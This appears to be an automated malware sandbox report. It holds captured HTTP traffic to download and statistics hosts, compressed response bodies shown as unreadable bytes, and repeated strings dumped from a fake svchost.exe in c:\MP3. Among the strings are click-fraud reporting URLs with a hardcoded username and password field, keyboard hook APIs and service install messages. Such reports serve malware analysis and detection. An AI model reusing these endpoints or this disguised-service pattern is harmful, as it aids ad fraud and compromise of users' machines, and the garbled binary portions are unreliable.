Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224.............Z[o.Hv. .6....D....B.,.....|..@...X6o&..X1.....b'.>........."@.l.........SU.$.mwg0..`l@,..NU....Um~.9l.\...6q....d.sl...z;BU.bK........)bT......gb..Y^.H.?h]}.u..?h]{.u.q....7.l..._~.....(...C....2l..[..":p..2....).}. ..'.....i...H...!...F.4cb.0.N..]....|..f...s.#...s|..vf...(...I..!...........p.G.t...H.(2B...{ .S.............4EB...l"a.....[pA.\.......Y~.......-.l..8Q:........\.3..@.`.9....s...C.."[...V.q.4.D.|~:......U.=.*.Q...t..o.8...K.0..b.U(..r....R..#oW;..S..[Ue{..._.P...T.*H.H..#.8h..O...e3.k6#2....7...'..H&.LS...w$.K.*....JvI...]...I.o"..Y..;&.Fr..6... &...."]......7.O.Dl....J.......`.A...D%.....(...A..c....w(QH..8..@r..K.>."d..t.../\=.cOS..n...Ci..E!...d..cO3`.......^.}p.E..K..l.9..HS....^-...\.....TP....aQ.....?.......................?...Z!......?.a..._...b.......B...&.q'..A. .T(..G0.*2..=.....g.R4.&(.r...D..;.J]l.........^Jb}M..F!&..x...uS..6...wB.$....i...].Wm.....i.M..rM...>....{c(..N.C..N^{.........a-........h...".....:V.J...D..2.'.3.0.....).hK...s.....108...c.%.P...._..8..=&>m.... Q&~...@....@.....7..k.o...P..b.)t5gz#|k.... ....(..9..scl.Y!D...#....]L.Il.^a..s...l.i.c....0[ ..\......HD...f*'8V.z......6&.c..`...O......{x(Pfq.....N..t..|*.T.hk.Kf%.((.?..4.... ....d.p..}...t"\}p..05!..l./...o.........|....b....P.`...p......2./a..(.A..vK..1.6*...GC...i..].VN......gF..\m.7.px.3..3.A.....!......s.7. {...,....G..J....$..(.....J...'...........'.o../..]}.Rn$u\.r..i...RY./.A9Qc.....M......@..C.,E\Rk., .`..|r..N....^t._:C...P...eR.fy.}.....^.[*.Stb.Q..t..A.?.....K....O.PR..(".#.Q
<<
<<< skipped >>>
GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www4.softuu.cn
Connection: Keep-Alive
Cookie: PHPSESSID=kc4506f6moav0eu2hecipfahm4
HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:46 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224.............Z[o.Hv. 5l.e.)....ey!K.[m[v[..` PdQ,.7.E]..H...`..d......y.Kv. .6.v~.\v.ENU..lw{:....c.b.Xu......j...Q...x...u..>..>%.r(...M..6.b....Q....JP....3..Y....4..z...k@.Q...[.........O....O6z.Y....p(..=X..us{..T.N. .oc2iJm......y.%C.4%.g....@.......Z9......nJ7x>.C3Z....E.?.._7..Y..!...a..b..yH.H>.Ji...q...Tx@........[Q.b..]....G...3y.Q...bb4.c4%.F..R..X......CWg.P..6...?p.lt.c.....].3...,Xa.-........C......J#..&..V(L...ZT....._Gy&...n3.-..y.{..F.^....V).. .\.......(..J...Tvv*j.%..|.N.....d:1J.......9_...f .s..F.9.M2.MG6.l.r...#;D.U...vI...].....X6|....2..1.0.....d..1......r ......}.ej....P.............$*..U.D@ql......h...C.A.=.......X....a.7f.'.x....x...t.$..J#.-.......2.4.......0.....[...da...E..kj1.5......k.!1B...]..1.d../...?..._.....[x..w.{..w......B $...z..S.....E{Q*.......-..Hh......R...BY8$..0.i......&..K... ....&.1Vw....4.FQ,...C........CB...t......m.-k.Q.$....i...].Wm.S...k.M..rM...>..G..1.....Pd....OHDF.!.......Z.LL..4..X.U.lnI./C..Dkb..9....q...Q.....R.}..Bpu.C.......lI:.C.X.......c..f.U...s..4...>8..l../.p#..a..L......M..y...;.....)..%E)...h...K....X..0...w1%&..z.cC.1....Lk8.D.......r....QB .....i......F-.5...r....V..O..B....<.....S.yL..}z..1.D*..5.%.B/...OE...t. ..?E%.;.@k_6.%6..>...L.E.CL......J..6`.`N.[$...S../.R.....#=\.h.U.x..UE..FH.[.5...Q..N>....N.E...r..a.R....4$..z...g>sl<............P.1.xc........0.qP.........E.X...T.D.?...b..E...WOQ.@./.B\}.Sn$uB....i..`RY./!.\..R..9$.Ll)...H..C.,E\Vk., .`..br..N....^t._:C...P...eR.f..}....J..-..)61...M6.. ..c..M
<<
<<< skipped >>>
POST /stat/stat HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 25
sid=1005&pid=0&sw=C_gr294
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1806
Date: Wed, 16 Apr 2014 08:33:49 GMT
Connection: close
<html><head><title>Apache Tomcat/7.0.22 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>java.io.FileNotFoundException: /home/knet/stat/cfg/url.properties (No such file or directory)..java.io.FileInputStream.open(Native Method)..java.io.FileInputStream.<init>(FileInputStream.java:120)..java.io.FileInputStream.<init>(FileInputStream.java:79)..java.io.FileReader.<init>(FileReader.java:41)..net.knowledgeservice.pub.util.FileUtil.fileToArray(FileUtil.java:103).
<<
<<< skipped >>>
POST /stat/stat HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 54
sid=0104&os=6&FromTo=(002.006.000.000-002.006.000.042)
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1806
Date: Wed, 16 Apr 2014 08:33:49 GMT
Connection: close
<html><head><title>Apache Tomcat/7.0.22 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>java.io.FileNotFoundException: /home/knet/stat/cfg/url.properties (No such file or directory)..java.io.FileInputStream.open(Native Method)..java.io.FileInputStream.<init>(FileInputStream.java:120)..java.io.FileInputStream.<init>(FileInputStream.java:79)..java.io.FileReader.<init>(FileReader.java:41)..net.knowledgeservice.pub.util.FileUtil.fileToArray(FileUtil.java:103).
<<
<<< skipped >>>
Map
Strings from Dumps
svchost.exe_1992:
`.rsrc
`.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
Proportional
Proportional
MAPI32.DLL
MAPI32.DLL
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeyword
HelpKeyword
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Password
Password
OnExecute4
OnExecute4
ole32.dll
ole32.dll
olepro32.dll
olepro32.dll
supports
supports
importNode
importNode
%s="%s"
%s="%s"
%s%s%s: %d%s%s
%s%s%s: %d%s%s
getservbyport
getservbyport
WSAAsyncGetServByPort
WSAAsyncGetServByPort
WSAJoinLeaf
WSAJoinLeaf
WS2_32.DLL
WS2_32.DLL
127.0.0.1
127.0.0.1
TIdSocketListWindows
TIdSocketListWindows
TIdStackWindowsU
TIdStackWindowsU
IdStackWindows
IdStackWindows
%s, %d %s %d %s %s
%s, %d %s %d %s %s
password
password
IdHTTPHeaderInfo
IdHTTPHeaderInfo
ProxyPassword<</pre><pre>ProxyPort</pre><pre>Mozilla/3.0 (compatible; Indy Library)</pre><pre>ftpTransfer</pre><pre>ftpReady</pre><pre>ftpAborted</pre><pre>ClientPortMin<</pre><pre>ClientPortMax</pre><pre>PortT</pre><pre>EIdCanNotBindPortInRange</pre><pre>EIdInvalidPortRangeSVW</pre><pre>libeay32.dll</pre><pre>ssleay32.dll</pre><pre>SSL_CTX_use_PrivateKey_file</pre><pre>SSL_CTX_use_certificate_file</pre><pre>SSL_get_peer_certificate</pre><pre>SSL_CTX_set_default_passwd_cb</pre><pre>SSL_CTX_set_default_passwd_cb_userdata</pre><pre>SSL_CTX_check_private_key</pre><pre>X509_STORE_CTX_get_current_cert</pre><pre>des_set_key</pre><pre>saUsernamePassword</pre><pre>Password<</pre><pre>Port</pre><pre>0.0.0.1</pre><pre>TIdTCPConnection</pre><pre>IdTCPConnection</pre><pre>EIdTCPConnectionError</pre><pre>sslvrfFailIfNoPeerCert</pre><pre>TPasswordEvent</pre><pre>Certificate</pre><pre>RootCertFile</pre><pre>CertFile</pre><pre>KeyFile</pre><pre>OnGetPasswordPeH</pre><pre>EIdOSSLLoadingRootCertError</pre><pre>EIdOSSLLoadingCertError</pre><pre>EIdOSSLLoadingKeyError</pre><pre>TIdTCPClient</pre><pre>TIdTCPClient4</pre><pre>IdTCPClient</pre><pre>BoundPort</pre><pre>PortU</pre><pre>CommentURL</pre><pre>TIdHTTPMethod</pre><pre>IdHTTP</pre><pre>TIdHTTPOption</pre><pre>TIdHTTPOptions</pre><pre>TIdHTTPProtocolVersion</pre><pre>IdHTTP4</pre><pre>TIdHTTPOnRedirectEvent</pre><pre>TIdHTTPResponse</pre><pre>TIdHTTPRequest</pre><pre>TIdHTTPProtocol</pre><pre>TIdCustomHTTP</pre><pre>TIdHTTP</pre><pre>HTTPOptions0</pre><pre>EIdHTTPProtocolException</pre><pre>HTTPS</pre><pre>https</pre><pre>This request method is supported in HTTP 1.1</pre><pre>HTTP/1.0 200 OK</pre><pre>HTTP/</pre><pre>IWebBrowser</pre><pre>IWebBrowserApp</pre><pre>IWebBrowser2P</pre><pre>TWebBrowserStatusTextChange</pre><pre>TWebBrowserProgressChange</pre><pre>TWebBrowserCommandStateChange</pre><pre>TWebBrowserTitleChange</pre><pre>TWebBrowserPropertyChange</pre><pre>TWebBrowserBeforeNavigate2</pre><pre>TWebBrowserNewWindow2</pre><pre>TWebBrowserNavigateComplete2</pre><pre>TWebBrowserDocumentComplete</pre><pre>TWebBrowserOnVisible</pre><pre>TWebBrowserOnToolBar</pre><pre>TWebBrowserOnMenuBar</pre><pre>TWebBrowserOnStatusBar</pre><pre>TWebBrowserOnFullScreen</pre><pre>TWebBrowserOnTheaterMode</pre><pre>TWebBrowserWindowSetResizable</pre><pre>TWebBrowserWindowSetLeft</pre><pre>TWebBrowserWindowSetTop</pre><pre>TWebBrowserWindowSetWidth</pre><pre>TWebBrowserWindowSetHeight</pre><pre>TWebBrowserWindowClosing</pre><pre>TWebBrowserClientToHostWindow</pre><pre>TWebBrowserSetSecureLockIcon</pre><pre>TWebBrowserFileDownload</pre><pre>TWebBrowserNavigateError</pre><pre>%TWebBrowserPrintTemplateInstantiation</pre><pre>TWebBrowserPrintTemplateTeardown</pre><pre>TWebBrowserUpdatePageStatus</pre><pre>%TWebBrowserPrivacyImpactedStateChange</pre><pre>TWebBrowserNewWindow3</pre><pre>bstrUrlContext</pre><pre>bstrUrl</pre><pre>TWebBrowser</pre><pre>TWebBrowserX</pre><pre>OnWindowSetResizable</pre><pre>OnWindowSetLeft</pre><pre>OnWindowSetTop4</pre><pre>OnWindowSetWidth</pre><pre>OnWindowSetHeight</pre><pre>DLCTL_URL_ENCODING_DISABLE_UTF8</pre><pre>DLCTL_URL_ENCODING_ENABLE_UTF8</pre><pre>FzWebBrowser</pre><pre>TFzWebBrowser</pre><pre>WebBrowser1</pre><pre>WebBrowser1NavigateError</pre><pre>WebBrowser1NewWindow2</pre><pre>WebBrowser1NewWindow3</pre><pre>http://www.wodiandian.com/client_submit_click_data.do?username=aaajjj&password=</pre><pre>&key=</pre><pre>WebBrowser1NewWindow2"</pre><pre>WebBrowser1StatusTextChange</pre><pre>Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3</pre><pre>AppEvents\Schemes\Apps\Explorer\Navigating\.Current</pre><pre>Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</pre><pre>*.txt</pre><pre>http://www.wodiandian.com/client_reload_urls_data.do?username=aaajjj&password=</pre><pre><?xml version="1.0" encoding="gb2312" ?><data><data_start>%s</data_start></data></pre><pre>\Software\Microsoft\Windows\CurrentVersion\Internet Settings</pre><pre>http://</pre><pre><data_click><data_key>%s</data_key><url_id>%s</url_id><usr_id>%s</usr_id><type>%s</type><check>%S</check></data_click></pre><pre>ServiceExecute</pre><pre>c:\MP3\svchost.exe</pre><pre>c:\MP3</pre><pre>?456789:;<=</pre><pre>!"#$%&'()* ,-./0123</pre><pre>user32.dll</pre><pre>GetKeyboardType</pre><pre>advapi32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegCloseKey</pre><pre>ReportEventA</pre><pre>RegFlushKey</pre><pre>RegCreateKeyExA</pre><pre>WinExec</pre><pre>GetCPInfo</pre><pre>version.dll</pre><pre>gdi32.dll</pre><pre>SetViewportOrgEx</pre><pre>UnhookWindowsHookEx</pre><pre>SetWindowsHookExA</pre><pre>MsgWaitForMultipleObjects</pre><pre>MapVirtualKeyA</pre><pre>LoadKeyboardLayoutA</pre><pre>GetKeyboardState</pre><pre>GetKeyboardLayoutList</pre><pre>GetKeyboardLayout</pre><pre>GetKeyState</pre><pre>GetKeyNameTextA</pre><pre>EnumWindows</pre><pre>EnumThreadWindows</pre><pre>ActivateKeyboardLayout</pre><pre>wininet.dll</pre><pre>333333333333333333</pre><pre>33333833</pre><pre>3333339</pre><pre>3333333333333338</pre><pre>:*"*"$3338</pre><pre>3333333</pre><pre>33333333</pre><pre>33333333333</pre><pre>3333333333338</pre><pre>33338?383</pre><pre>333333333333</pre><pre>:*3:"$3338</pre><pre>333333333333333</pre><pre>KWindows</pre><pre>UrlMon</pre><pre>0IdHTTPHeaderInfo</pre><pre> IdTCPServer</pre><pre>IdTCPStream</pre><pre>.SHDocVw_TLB</pre><pre>Font.Charset</pre><pre>Font.Color</pre><pre>Font.Height</pre><pre>Font.Name</pre><pre>Font.Style</pre><pre>OnExecute</pre><pre>http://www.w3.org/2001/XMLSchema</pre><pre>http://www.w3.org/2000/xmlns/</pre><pre>http://www.w3.org/2001/XMLSchema-instance</pre><pre>http://www.easy78.cn</pre><pre>Command not supported.</pre><pre>Address type not supported.$Error accepting connection with SSL.</pre><pre>Error creating SSL context. Could not load root certificate.</pre><pre>Could not load certificate.#Could not load key, check password.</pre><pre>SSL status: "%s"</pre><pre>Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.</pre><pre>0Address family not supported by protocol family.</pre><pre>Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.</pre><pre>Operation would block.</pre><pre>Operation now in progress.</pre><pre>Operation already in progress.</pre><pre>Socket operation on non-socket.</pre><pre>Protocol not supported.</pre><pre>Socket type not supported."Operation not supported on socket.</pre><pre>Protocol family not supported.</pre><pre>Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)</pre><pre>Resolving hostname %s.</pre><pre>Connecting to %s.</pre><pre>Chunk StartedDThis authentication method is already registered with class name %s.</pre><pre>%s is not a valid service.</pre><pre>Socket Error # %d</pre><pre>Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.</pre><pre>File "%s" not found1Only one TIdAntiFreeze can exist per application.</pre><pre>No data to read.$Can not bind in port range (%d - %d)</pre><pre>Invalid Port Range (%d - %d)</pre><pre><Selected DOM Vendor does not support this property or method><pre>Node "%s" not found</pre><pre>IDOMNode required.Attributes are not supported on this node type</pre><pre>Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions</pre><pre>Node is readonlyCRefresh is only supported if the FileName or XML properties are set</pre><pre>No help keyword specified.</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s)"%s" DOMImplementation already registered</pre><pre>No matching DOM Vendor: "%s"</pre><pre>No help found for %s#No context-sensitive help installed$No topic-based help system installed</pre><pre>shutdown(Service failed in custom message(%d): %s</pre><pre>Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"</pre><pre>Alt Clipboard does not support Icons</pre><pre>Cannot open clipboard/Menu '%s' is already being used by another form</pre><pre>Service failed on %s: %s</pre><pre> Cannot focus a disabled or invisible window!Control '%s' has no parent window</pre><pre>Thread Error: %s (%d)</pre><pre>Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic</pre><pre>Unsupported clipboard format</pre><pre>List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream</pre><pre>Error reading %s%s%s: %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid stream format$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s'</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Interface not supported</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>Invalid variant operation</pre><pre>Invalid NULL variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>!'%s' is not a valid integer value</pre><pre>I/O error %d</pre><pre>Integer overflow Invalid floating point operation</pre><b>svchost.exe_1992_rwx_003D0000_00002000:</b><pre>The procedure %s could not be located in the DLL %s.</pre><pre>The ordinal %d could not be located in the DLL %s.</pre><b>svchost.exe_1992_rwx_00401000_000B5000:</b><pre>kernel32.dll</pre><pre>Windows</pre><pre>MSWHEEL_ROLLMSG</pre><pre>MSH_WHEELSUPPORT_MSG</pre><pre>MSH_SCROLL_LINES_MSG</pre><pre>$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)</pre><pre>oleaut32.dll</pre><pre>EVariantBadIndexError</pre><pre>ssShift</pre><pre>htKeyword</pre><pre>EInvalidOperation</pre><pre>u%CNu</pre><pre>%s[%d]</pre><pre>%s_%d</pre><pre>EInvalidGraphicOperation</pre><pre>USER32.DLL</pre><pre>comctl32.dll</pre><pre>uxtheme.dll</pre><pre>%s%s%s%s%s%s%s%s%s%s</pre><pre>Proportional</pre><pre>MAPI32.DLL</pre><pre>OnKeyDown</pre><pre>OnKeyPress</pre><pre>OnKeyUp</pre><pre>IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")</pre><pre>JumpID("","%s")</pre><pre>TKeyEvent</pre><pre>TKeyPressEvent</pre><pre>HelpKeyword</pre><pre>crSQLWait</pre><pre>%s (%s)</pre><pre>imm32.dll</pre><pre>AutoHotkeys</pre><pre>ssHotTrack</pre><pre>TWindowState</pre><pre>poProportional</pre><pre>TWMKey</pre><pre>KeyPreview</pre><pre>WindowState</pre><pre>System\CurrentControlSet\Control\Keyboard Layouts\%.8x</pre><pre>vcltest3.dll</pre><pre>User32.dll</pre><pre>Password</pre><pre>OnExecute4</pre><pre>ole32.dll</pre><pre>olepro32.dll</pre><pre>supports</pre><pre>importNode</pre><pre>%s="%s"</pre><pre>%s%s%s: %d%s%s</pre><pre>getservbyport</pre><pre>WSAAsyncGetServByPort</pre><pre>WSAJoinLeaf</pre><pre>WS2_32.DLL</pre><pre>127.0.0.1</pre><pre>TIdSocketListWindows</pre><pre>TIdStackWindowsU</pre><pre>IdStackWindows</pre><pre>%s, %d %s %d %s %s</pre><pre>password</pre><pre>IdHTTPHeaderInfo</pre><pre>ProxyPassword<</pre><pre>ProxyPort</pre><pre>Mozilla/3.0 (compatible; Indy Library)</pre><pre>ftpTransfer</pre><pre>ftpReady</pre><pre>ftpAborted</pre><pre>ClientPortMin<</pre><pre>ClientPortMax</pre><pre>PortT</pre><pre>EIdCanNotBindPortInRange</pre><pre>EIdInvalidPortRangeSVW</pre><pre>libeay32.dll</pre><pre>ssleay32.dll</pre><pre>SSL_CTX_use_PrivateKey_file</pre><pre>SSL_CTX_use_certificate_file</pre><pre>SSL_get_peer_certificate</pre><pre>SSL_CTX_set_default_passwd_cb</pre><pre>SSL_CTX_set_default_passwd_cb_userdata</pre><pre>SSL_CTX_check_private_key</pre><pre>X509_STORE_CTX_get_current_cert</pre><pre>des_set_key</pre><pre>saUsernamePassword</pre><pre>Password<</pre><pre>Port</pre><pre>0.0.0.1</pre><pre>TIdTCPConnection</pre><pre>IdTCPConnection</pre><pre>EIdTCPConnectionError</pre><pre>sslvrfFailIfNoPeerCert</pre><pre>TPasswordEvent</pre><pre>Certificate</pre><pre>RootCertFile</pre><pre>CertFile</pre><pre>KeyFile</pre><pre>OnGetPasswordPeH</pre><pre>EIdOSSLLoadingRootCertError</pre><pre>EIdOSSLLoadingCertError</pre><pre>EIdOSSLLoadingKeyError</pre><pre>TIdTCPClient</pre><pre>TIdTCPClient4</pre><pre>IdTCPClient</pre><pre>BoundPort</pre><pre>PortU</pre><pre>CommentURL</pre><pre>TIdHTTPMethod</pre><pre>IdHTTP</pre><pre>TIdHTTPOption</pre><pre>TIdHTTPOptions</pre><pre>TIdHTTPProtocolVersion</pre><pre>IdHTTP4</pre><pre>TIdHTTPOnRedirectEvent</pre><pre>TIdHTTPResponse</pre><pre>TIdHTTPRequest</pre><pre>TIdHTTPProtocol</pre><pre>TIdCustomHTTP</pre><pre>TIdHTTP</pre><pre>HTTPOptions0</pre><pre>EIdHTTPProtocolException</pre><pre>HTTPS</pre><pre>https</pre><pre>This request method is supported in HTTP 1.1</pre><pre>HTTP/1.0 200 OK</pre><pre>HTTP/</pre><pre>IWebBrowser</pre><pre>IWebBrowserApp</pre><pre>IWebBrowser2P</pre><pre>TWebBrowserStatusTextChange</pre><pre>TWebBrowserProgressChange</pre><pre>TWebBrowserCommandStateChange</pre><pre>TWebBrowserTitleChange</pre><pre>TWebBrowserPropertyChange</pre><pre>TWebBrowserBeforeNavigate2</pre><pre>TWebBrowserNewWindow2</pre><pre>TWebBrowserNavigateComplete2</pre><pre>TWebBrowserDocumentComplete</pre><pre>TWebBrowserOnVisible</pre><pre>TWebBrowserOnToolBar</pre><pre>TWebBrowserOnMenuBar</pre><pre>TWebBrowserOnStatusBar</pre><pre>TWebBrowserOnFullScreen</pre><pre>TWebBrowserOnTheaterMode</pre><pre>TWebBrowserWindowSetResizable</pre><pre>TWebBrowserWindowSetLeft</pre><pre>TWebBrowserWindowSetTop</pre><pre>TWebBrowserWindowSetWidth</pre><pre>TWebBrowserWindowSetHeight</pre><pre>TWebBrowserWindowClosing</pre><pre>TWebBrowserClientToHostWindow</pre><pre>TWebBrowserSetSecureLockIcon</pre><pre>TWebBrowserFileDownload</pre><pre>TWebBrowserNavigateError</pre><pre>%TWebBrowserPrintTemplateInstantiation</pre><pre>TWebBrowserPrintTemplateTeardown</pre><pre>TWebBrowserUpdatePageStatus</pre><pre>%TWebBrowserPrivacyImpactedStateChange</pre><pre>TWebBrowserNewWindow3</pre><pre>bstrUrlContext</pre><pre>bstrUrl</pre><pre>TWebBrowser</pre><pre>TWebBrowserX</pre><pre>OnWindowSetResizable</pre><pre>OnWindowSetLeft</pre><pre>OnWindowSetTop4</pre><pre>OnWindowSetWidth</pre><pre>OnWindowSetHeight</pre><pre>DLCTL_URL_ENCODING_DISABLE_UTF8</pre><pre>DLCTL_URL_ENCODING_ENABLE_UTF8</pre><pre>FzWebBrowser</pre><pre>TFzWebBrowser</pre><pre>WebBrowser1</pre><pre>WebBrowser1NavigateError</pre><pre>WebBrowser1NewWindow2</pre><pre>WebBrowser1NewWindow3</pre><pre>http://www.wodiandian.com/client_submit_click_data.do?username=aaajjj&password=</pre><pre>&key=</pre><pre>WebBrowser1NewWindow2"</pre><pre>WebBrowser1StatusTextChange</pre><pre>Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3</pre><pre>AppEvents\Schemes\Apps\Explorer\Navigating\.Current</pre><pre>Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</pre><pre>*.txt</pre><pre>http://www.wodiandian.com/client_reload_urls_data.do?username=aaajjj&password=</pre><pre><?xml version="1.0" encoding="gb2312" ?><data><data_start>%s</data_start></data></pre><pre>\Software\Microsoft\Windows\CurrentVersion\Internet Settings</pre><pre>http://</pre><pre><data_click><data_key>%s</data_key><url_id>%s</url_id><usr_id>%s</usr_id><type>%s</type><check>%S</check></data_click></pre><pre>ServiceExecute</pre><pre>c:\MP3\svchost.exe</pre><pre>c:\MP3</pre><pre>?456789:;<=</pre><pre>!"#$%&'()* 